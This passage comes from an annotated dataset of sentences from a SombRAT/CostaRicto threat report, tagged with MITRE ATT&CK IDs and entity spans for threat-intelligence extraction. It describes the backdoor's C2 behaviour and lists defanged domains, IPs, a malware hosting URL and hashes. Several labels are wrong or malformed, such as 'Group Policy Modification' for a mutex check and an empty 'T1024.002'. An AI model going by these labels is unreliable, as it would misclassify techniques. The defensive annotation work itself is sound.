actions, like collecting system information, listing and killing processes, and uploading files to the C2.", "sentence_text": "Features:\nCommunication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain C2 traffic encrypted with RSA-2048 Custom AES-encrypted storage format used to store configuration, plugins, and harvested data Unique version number for each sample", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Uses DNS tunneling, encrypted C2 traffic, and AES-encrypted storage for configs, plugins, and data.", "entities": [ { "text": "hardcoded domain name", "start": 47, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "DGA-generated subdomain ", "start": 73, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "encrypted with RSA-2048 ", "start": 108, "end": 132, "label": "Action" }, { "text": "store configuration, plugins, and harvested data", "start": 176, "end": 224, "label": "Action" }, { "text": "DNS tunnel", "start": 29, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "C2 traffic ", "start": 97, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "Custom AES-encrypted storage format ", "start": 132, "end": 168, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-86_mitre_report-p1-s41-e865ea", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "Features:\nCommunication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain C2 traffic encrypted with RSA-2048 Custom AES-encrypted storage format used to store configuration, plugins, and harvested data Unique version number for each sample", "sentence_text": "According to a PDB path found in the 64-bit specimens, the project was originally called Sombra – possibly in reference to the Overwatch game character :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s42-c47c09", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "According to a PDB path found in the 64-bit specimens, the project was originally called Sombra – possibly in reference to the Overwatch game character :", "sentence_text": "In the Overwatch game world, Sombra is an agent of an antagonist organization called Talon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s43-b62f48", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "In the Overwatch game world, Sombra is an agent of an antagonist organization called Talon.", "sentence_text": "She is skilled in computer hacking and cryptography and specializes in espionage and intelligence assessment:\n“One of the world's most notorious hackers, Sombra uses information to manipulate those in power.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s44-e31acb", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "She is skilled in computer hacking and cryptography and specializes in espionage and intelligence assessment:\n“One of the world's most notorious hackers, Sombra uses information to manipulate those in power.", "sentence_text": "Sombra's skills include computer hacking and cryptography; these are activities she greatly enjoys, to the point where the desire to get past locks and solving mysteries is ingrained in her personality.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s45-769292", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "Sombra's skills include computer hacking and cryptography; these are activities she greatly enjoys, to the point where the desire to get past locks and solving mysteries is ingrained in her personality.", "sentence_text": "She is a known associate of Reaper, specializing in espionage and intelligence assessment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s46-44e34f", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "She is a known associate of Reaper, specializing in espionage and intelligence assessment.", "sentence_text": "Stealth and debilitating attacks make Sombra a powerful infiltrator.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s47-e63db5", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "Stealth and debilitating attacks make Sombra a powerful infiltrator.", "sentence_text": "Sombra’s ability to Translocate and camouflage herself makes her a hard target to pin down.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s48-d5d9ec", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "Sombra’s ability to Translocate and camouflage herself makes her a hard target to pin down.”", "sentence_text": "Embedded in each sample is a hardcoded version number, with the following versions observed thus far:\nOne of the backdoor samples (0.1.60 (DT)) was found to be hosted on http[://]159.65.31[.]84/svolcdst.exe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s49-abf48a", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "Embedded in each sample is a hardcoded version number, with the following versions observed thus far:\nOne of the backdoor samples (0.1.60 (DT)) was found to be hosted on http[://]159.65.31[.]84/svolcdst.exe.", "sentence_text": "Behaviour\nBefore entering the command processing loop, the backdoor will check to see if it’s running as a service, and will create a run-once mutex consisting of %HOSTNAME% with a postfix of “S”, “U”, or “SU”, depending on which privileges it was executed with.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1484.001", "name": "Group Policy Modification" } ], "procedure": "Checks if running as a service and creates a mutex based on hostname and privilege level.", "entities": [ { "text": "backdoor ", "start": 59, "end": 68, "label": "MalwareTool" }, { "text": "check to see if it’s running as a service", "start": 73, "end": 114, "label": "Action" }, { "text": "create a run-once mutex ", "start": 125, "end": 149, "label": "Action" }, { "text": " mutex ", "start": 142, "end": 149, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s50-dc9055", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "Behaviour\nBefore entering the command processing loop, the backdoor will check to see if it’s running as a service, and will create a run-once mutex consisting of %HOSTNAME% with a postfix of “S”, “U”, or “SU”, depending on which privileges it was executed with.", "sentence_text": "The C2 domain name for the DNS communication is hardcoded and obfuscated using XOR.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Hardcodes and XOR-obfuscates the C2 domain.", "entities": [ { "text": "C2 domain name", "start": 4, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "obfuscated using XOR.", "start": 62, "end": 83, "label": "Action" }, { "text": "hardcoded", "start": 48, "end": 57, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s51-88b242", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "The C2 domain name for the DNS communication is hardcoded and obfuscated using XOR.", "sentence_text": "The backdoor will generate a subdomain using a custom domain generation algorithm (DGA) and try to send an initial beacon to the C2 via DNS tunneling:\nThe configuration, along with downloaded plugins and all harvested data are stored in a custom database format inside a single file under the %TEMP% directory.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Generates a DGA subdomain and sends an initial DNS beacon to the C2.", "entities": [ { "text": "backdoor ", "start": 4, "end": 13, "label": "MalwareTool" }, { "text": "%TEMP% directory", "start": 293, "end": 309, "label": "Infrastructure_Indicator" }, { "text": "generate a subdomain ", "start": 18, "end": 39, "label": "Action" }, { "text": "send an initial beacon", "start": 99, "end": 121, "label": "Action" }, { "text": "stored in a custom database format ", "start": 227, "end": 262, "label": "Action" }, { "text": "subdomain", "start": 29, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "C2", "start": 129, "end": 131, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-86_mitre_report-p1-s52-64f418", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "The backdoor will generate a subdomain using a custom domain generation algorithm (DGA) and try to send an initial beacon to the C2 via DNS tunneling:\nThe configuration, along with downloaded plugins and all harvested data are stored in a custom database format inside a single file under the %TEMP% directory.", "sentence_text": "The file name is hardcoded and obfuscated with XOR.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Uses XOR to obfuscate a hardcoded file name", "entities": [ { "text": " hardcoded and obfuscated with XOR", "start": 16, "end": 50, "label": "Action" }, { "text": "file name ", "start": 4, "end": 14, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s53-04805e", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "The file name is hardcoded and obfuscated with XOR.", "sentence_text": "The storage file is encrypted with AES-256 using a hardcoded key and is decrypted each time the malware needs to read or write it and re-encrypted after new data is added:\nStrings used as backdoor commands and in debugging messages sent to the C2 are encoded with a simple alphabet substitution.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Encrypts the storage file with AES-256 using a hardcoded key and repeatedly decrypts and re-encrypts it when accessed.", "entities": [ { "text": "encrypted with AES-256", "start": 20, "end": 42, "label": "Action" }, { "text": "decrypted each time the malware needs to read or write it ", "start": 72, "end": 130, "label": "Action" }, { "text": " re-encrypted after new data is added", "start": 133, "end": 170, "label": "Action" }, { "text": "encoded with a simple alphabe", "start": 251, "end": 280, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s54-c2d2b9", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "The storage file is encrypted with AES-256 using a hardcoded key and is decrypted each time the malware needs to read or write it and re-encrypted after new data is added:\nStrings used as backdoor commands and in debugging messages sent to the C2 are encoded with a simple alphabet substitution.", "sentence_text": "These are not decrypted by the backdoor on the victim’s side, and the key for decryption is not present in the binary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s55-3aa5f9", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "These are not decrypted by the backdoor on the victim’s side, and the key for decryption is not present in the binary.", "sentence_text": "Most probably the backdoor client decrypts them locally:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Backdoor client locally decrypts received data or payloads.", "entities": [ { "text": "backdoor client", "start": 18, "end": 33, "label": "MalwareTool" }, { "text": "decrypts them locally", "start": 34, "end": 55, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s56-6ab656", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "Most probably the backdoor client decrypts them locally:", "sentence_text": "Command and Control (C2)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s57-1f6e1b", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "Command and Control (C2)", "sentence_text": "The C2 communication can either be performed via DNS tunnelling or TCP sockets.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "The malware can send its C2 traffic either through DNS tunneling or through TCP sockets.", "entities": [ { "text": "performed via DNS tunnelling or TCP socket", "start": 35, "end": 77, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s58-9c0955", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "The C2 communication can either be performed via DNS tunnelling or TCP sockets.", "sentence_text": "Traffic is SSL-encrypted and can bypass HTTP/SOCKS5 proxies.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "The C2 traffic is encrypted with SSL, allowing it to evade HTTP or SOCKS5 proxy controls.", "entities": [ { "text": "SSL-encrypted", "start": 11, "end": 24, "label": "Action" }, { "text": " bypass HTTP/SOCKS5 proxies", "start": 32, "end": 59, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s59-572f4a", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "Traffic is SSL-encrypted and can bypass HTTP/SOCKS5 proxies.", "sentence_text": "The C2 domain name is hardcoded in the binary and obfuscated with a single-byte XOR key which differs between samples.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s60-b7b7dc", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "The C2 domain name is hardcoded in the binary and obfuscated with a single-byte XOR key which differs between samples.", "sentence_text": "In order to establish communication, the malware first uses a DGA (Domain Generation Algorithm) to generate the subdomain to connect to.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1568.002", "name": "Domain Generation Algorithms" } ], "procedure": "The malware generates a subdomain using a DGA before initiating communication.", "entities": [ { "text": "uses a DGA", "start": 55, "end": 65, "label": "Action" }, { "text": "generate the subdomain", "start": 99, "end": 121, "label": "Action" }, { "text": " malware", "start": 40, "end": 48, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s61-121c14", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "In order to establish communication, the malware first uses a DGA (Domain Generation Algorithm) to generate the subdomain to connect to.", "sentence_text": "Depending on an internal boolean setting, one of the following URL formats is used:\nimages\n%x.%s\nimages\n%x\n.elmako.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s62-781321", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "Depending on an internal boolean setting, one of the following URL formats is used:\nimages\n%x.%s\nimages\n%x\n.elmako.", "sentence_text": "All the communication is compressed with zlib and encrypted with AES.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "The malware compresses its communication using zlib and then encrypts it with AES.", "entities": [ { "text": "compressed with zlib ", "start": 25, "end": 46, "label": "Action" }, { "text": "encrypted with AES.", "start": 50, "end": 69, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s63-0fca02", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "All the communication is compressed with zlib and encrypted with AES.", "sentence_text": "First active during October 2019, infosportals[.]com was utilized by early SombRATs as the primary C2 domain.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Early SombRAT samples used the domain infosportals[.]com as their primary command-and-control endpoint.", "entities": [ { "text": "SombRATs", "start": 75, "end": 83, "label": "MalwareTool" }, { "text": "infosportals[.]com ", "start": 34, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "utilized by early SombRATs", "start": 57, "end": 83, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s64-d01661", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "First active during October 2019, infosportals[.]com was utilized by early SombRATs as the primary C2 domain.", "sentence_text": "Since then, the domain shifted IP address multiple times, was then taken offline between February and May, before being reactivated briefly between late May and mid-June as part of another offensive:\nSbibd[.]net\nA phishing domain mimicking the legitimate sbibd.com (registered to the State Bank of India, Bangladesh), sbibd[.]net was first active for a short spell from early November to December 2019, then reactivated again between February and March 2020 and was used as the primary C2 with several SombRAT variants:\nAkams[.]in\nFirst active for a few weeks from late December 2019 to mid-January 2020, akams[.]in was also used by multiple SombRAT samples for C2 communications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s65-1434d8", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "Since then, the domain shifted IP address multiple times, was then taken offline between February and May, before being reactivated briefly between late May and mid-June as part of another offensive:\nSbibd[.]net\nA phishing domain mimicking the legitimate sbibd.com (registered to the State Bank of India, Bangladesh), sbibd[.]net was first active for a short spell from early November to December 2019, then reactivated again between February and March 2020 and was used as the primary C2 with several SombRAT variants:\nAkams[.]in\nFirst active for a few weeks from late December 2019 to mid-January 2020, akams[.]in was also used by multiple SombRAT samples for C2 communications.", "sentence_text": "One of the prior resolutions, for IP 45.89.175.206, is particularly interesting, as it overlaps with another domain called mail[.]kub-gas[.]com, which was implicated as being associated with an APT-28/Fancy Bear/Sofacy phishing campaigns in a report by Area 1 Security .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "The IP overlapped with a domain previously linked to APT-28 phishing campaigns.", "entities": [ { "text": "APT-28/Fancy Bear/Sofacy", "start": 194, "end": 218, "label": "ThreatActor" }, { "text": "45.89.175.206", "start": 37, "end": 50, "label": "Infrastructure_Indicator" }, { "text": "mail[.]kub-gas[.]com", "start": 123, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "overlaps with another domain ", "start": 87, "end": 116, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s66-05304f", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "One of the prior resolutions, for IP 45.89.175.206, is particularly interesting, as it overlaps with another domain called mail[.]kub-gas[.]com, which was implicated as being associated with an APT-28/Fancy Bear/Sofacy phishing campaigns in a report by Area 1 Security .", "sentence_text": "newspointview[.]com\nRegistered and active during late June 2020, newspointview[.]com has been used with more recent SombRAT variants as the primary C2 domain:\nTimeline\nThe following timeline shows key domain/IP resolutions and known SombRAT releases:\nConclusions\nThere are several factors that lead us to the assumption that the threat actor behind CostaRicto is a mercenary group:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "The SombRAT malware used the domain newspointview[.]com as its primary C2.", "entities": [ { "text": "mercenary group:", "start": 365, "end": 381, "label": "ThreatActor" }, { "text": "SombRAT variants", "start": 116, "end": 132, "label": "MalwareTool" }, { "text": "newspointview[.]com", "start": 65, "end": 84, "label": "Infrastructure_Indicator" }, { "text": " used with more recent SombRAT variants", "start": 93, "end": 132, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s67-7c0411", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "newspointview[.]com\nRegistered and active during late June 2020, newspointview[.]com has been used with more recent SombRAT variants as the primary C2 domain:\nTimeline\nThe following timeline shows key domain/IP resolutions and known SombRAT releases:\nConclusions\nThere are several factors that lead us to the assumption that the threat actor behind CostaRicto is a mercenary group:", "sentence_text": "The toolset used in CostaRicto campaign consists of bespoke malware that appeared around October 2019 and has been rarely seen in the wild since.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s68-a2a5c5", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "The toolset used in CostaRicto campaign consists of bespoke malware that appeared around October 2019 and has been rarely seen in the wild since.", "sentence_text": "It therefore appears to be private to this particular adversary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s69-7a54c5", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "It therefore appears to be private to this particular adversary.", "sentence_text": "The apparent sharing of network infrastructure with a previous, seemingly unrelated phishing campaign attributed to APT28, as well as the reuse of phishing domain names as C2 servers in attacks against unrelated victims, indicates that the same entity is likely behind a diverse range of attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s70-7a9721", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "The apparent sharing of network infrastructure with a previous, seemingly unrelated phishing campaign attributed to APT28, as well as the reuse of phishing domain names as C2 servers in attacks against unrelated victims, indicates that the same entity is likely behind a diverse range of attacks.", "sentence_text": "With the undeniable success of Ransomware-as-a-Service (RaaS), it's not surprising that the cybercriminal market has expanded its portfolio to add dedicated phishing and espionage campaigns to the list of services on offer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s71-dc4ad9", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "With the undeniable success of Ransomware-as-a-Service (RaaS), it's not surprising that the cybercriminal market has expanded its portfolio to add dedicated phishing and espionage campaigns to the list of services on offer.", "sentence_text": "The attribution is often derived by analyzing the nature and geography of the campaign targets in relation to geopolitical situation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s72-5101c6", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "The attribution is often derived by analyzing the nature and geography of the campaign targets in relation to geopolitical situation.", "sentence_text": "Indicators of Compromise (IoCs):\nMITRE ATT&CK:\nYara Hunting Rules:\nIDAPython Scripts:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s73-cd6295", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "Indicators of Compromise (IoCs):\nMITRE ATT&CK:\nYara Hunting Rules:\nIDAPython Scripts:", "sentence_text": "About The BlackBerry Research and Intelligence Team The BlackBerry Research and Intelligence team is a highly experienced threat research group specializing in a wide range of cybersecurity disciplines, conducting continuous threat hunting to provide comprehensive insights into emerging threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s74-0bd082", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "About The BlackBerry Research and Intelligence Team The BlackBerry Research and Intelligence team is a highly experienced threat research group specializing in a wide range of cybersecurity disciplines, conducting continuous threat hunting to provide comprehensive insights into emerging threats.", "sentence_text": "We analyze and address various attack vectors, leveraging our deep expertise in the cyberthreat landscape to develop proactive strategies that safeguard against adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s75-3406ee", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "We analyze and address various attack vectors, leveraging our deep expertise in the cyberthreat landscape to develop proactive strategies that safeguard against adversaries.", "sentence_text": "Whether it's identifying new vulnerabilities or staying ahead of sophisticated attack tactics, we are dedicated to securing your digital assets with cutting-edge research and innovative solutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s76-f7b800", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "Whether it's identifying new vulnerabilities or staying ahead of sophisticated attack tactics, we are dedicated to securing your digital assets with cutting-edge research and innovative solutions.", "sentence_text": "Share on X Share on Facebook Share on LinkedIn Back", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s77-f649a1", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "Share on X Share on Facebook Share on LinkedIn Back", "sentence_text": "[FILTERED_TABLES_START]\nautorun.bat | Obfuscated batch script that sets PowerShell execution policy to unrestricted and executes autorun.ps1 ping", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "The batch script sets PowerShell execution policy to unrestricted and runs autorun.ps1.", "entities": [ { "text": "autorun.bat", "start": 24, "end": 35, "label": "MalwareTool" }, { "text": " autorun.ps1", "start": 128, "end": 140, "label": "MalwareTool" }, { "text": "sets PowerShell execution policy to unrestricted", "start": 67, "end": 115, "label": "Action" }, { "text": "executes autorun.ps1 ping", "start": 120, "end": 145, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s78-f5ec0b", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "[FILTERED_TABLES_START]\nautorun.bat | Obfuscated batch script that sets PowerShell execution policy to unrestricted and executes autorun.ps1 ping", "sentence_text": "| Core | Send a \"ping\" to the C2 server get | Config | Read specified values from .config file in storage and send to the C2 await&putcontent", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "The malware sends a ping to the C2 server and reads configuration values from a .config file, then transmits the collected data back to the C2 infrastructure.", "entities": [ { "text": "ping", "start": 17, "end": 21, "label": "Action" }, { "text": "C2 server", "start": 30, "end": 39, "label": "Infrastructure_Indicator" }, { "text": ".config file", "start": 82, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "send to the C2", "start": 110, "end": 124, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s79-aaaf05", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "| Core | Send a \"ping\" to the C2 server get | Config | Read specified values from .config file in storage and send to the C2 await&putcontent", "sentence_text": "| Storage | Read from C2 and save to the storage file await&getcontent | Storage | Read from content from storage and send via C2 touchconnect", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1005", "name": "Data from Local System" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "The malware reads data from the C2 server and stores it locally, then retrieves stored content and sends it back through C2 communication channels.", "entities": [ { "text": "C2", "start": 22, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "storage file", "start": 41, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "Read from C2", "start": 12, "end": 24, "label": "Action" }, { "text": "send via C2", "start": 118, "end": 129, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s80-ed2d08", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "| Storage | Read from C2 and save to the storage file await&getcontent | Storage | Read from content from storage and send via C2 touchconnect", "sentence_text": "| Network | Send the networkconnected bool setting to the C2 switchtotcp | Network | Switch C2 communication to TCP/IP switchdns | Network | Switch C2 communication to DNS getproxy 3 | Network | Send current proxy configuration to C2 130fa726df5a58e9334cc28dc62e3ebaa0b7c0d637fce1a66daff66ee05a9437", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "The commands switch the C2 channel between TCP and DNS and send network and proxy settings to the C2 server.", "entities": [ { "text": "C2 ", "start": 148, "end": 151, "label": "Infrastructure_Indicator" }, { "text": "Send the networkconnected bool setting to the C2 switchtotcp ", "start": 12, "end": 73, "label": "Action" }, { "text": " Switch C2 communication to TCP/IP", "start": 84, "end": 118, "label": "Action" }, { "text": "Switch C2 communication to DNS", "start": 141, "end": 171, "label": "Action" }, { "text": "Send current proxy configuration to C2", "start": 195, "end": 233, "label": "Action" }, { "text": "130fa726df5a58e9334cc28dc62e3ebaa0b7c0d637fce1a66daff66ee05a9437", "start": 234, "end": 298, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-86_mitre_report-p1-s82-a5c040", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "| SHA256", "sentence_text": "| SombRAT x86 loader 8062e1582525534b9c52c5d9a38d6b012746484a2714a14febe2d07af02c32d5 | SHA256", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1024.002", "name": "" } ], "procedure": "deployed SombRAT x86 loader", "entities": [ { "text": "SombRAT x86 loader ", "start": 2, "end": 21, "label": "MalwareTool" }, { "text": "8062e1582525534b9c52c5d9a38d6b012746484a2714a14febe2d07af02c32d5", "start": 21, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-86_mitre_report-p1-s83-16d1b1", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "| SombRAT x86 loader 8062e1582525534b9c52c5d9a38d6b012746484a2714a14febe2d07af02c32d5 | SHA256", "sentence_text": "| SombRAT x86 loader d69764b22d1b68aa9462f1f5f0bf18caebbcff4d592083f80dbce39c64890295 | SHA256", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1024.002", "name": "" } ], "procedure": "deployed SombRAT x86 loader", "entities": [ { "text": " SombRAT x86 loader ", "start": 1, "end": 21, "label": "MalwareTool" }, { "text": "d69764b22d1b68aa9462f1f5f0bf18caebbcff4d592083f80dbce39c64890295", "start": 21, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-86_mitre_report-p1-s84-12390f", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "| SombRAT x86 loader d69764b22d1b68aa9462f1f5f0bf18caebbcff4d592083f80dbce39c64890295 | SHA256", "sentence_text": "| SombRAT x86 loader f6ecdae3ae4769aaafc8a0faab30cb66dab8c9d3fff27764ff208be7a455125c | SHA256", "relevant": "yes", "tactic": [ { "id": "TA0002", 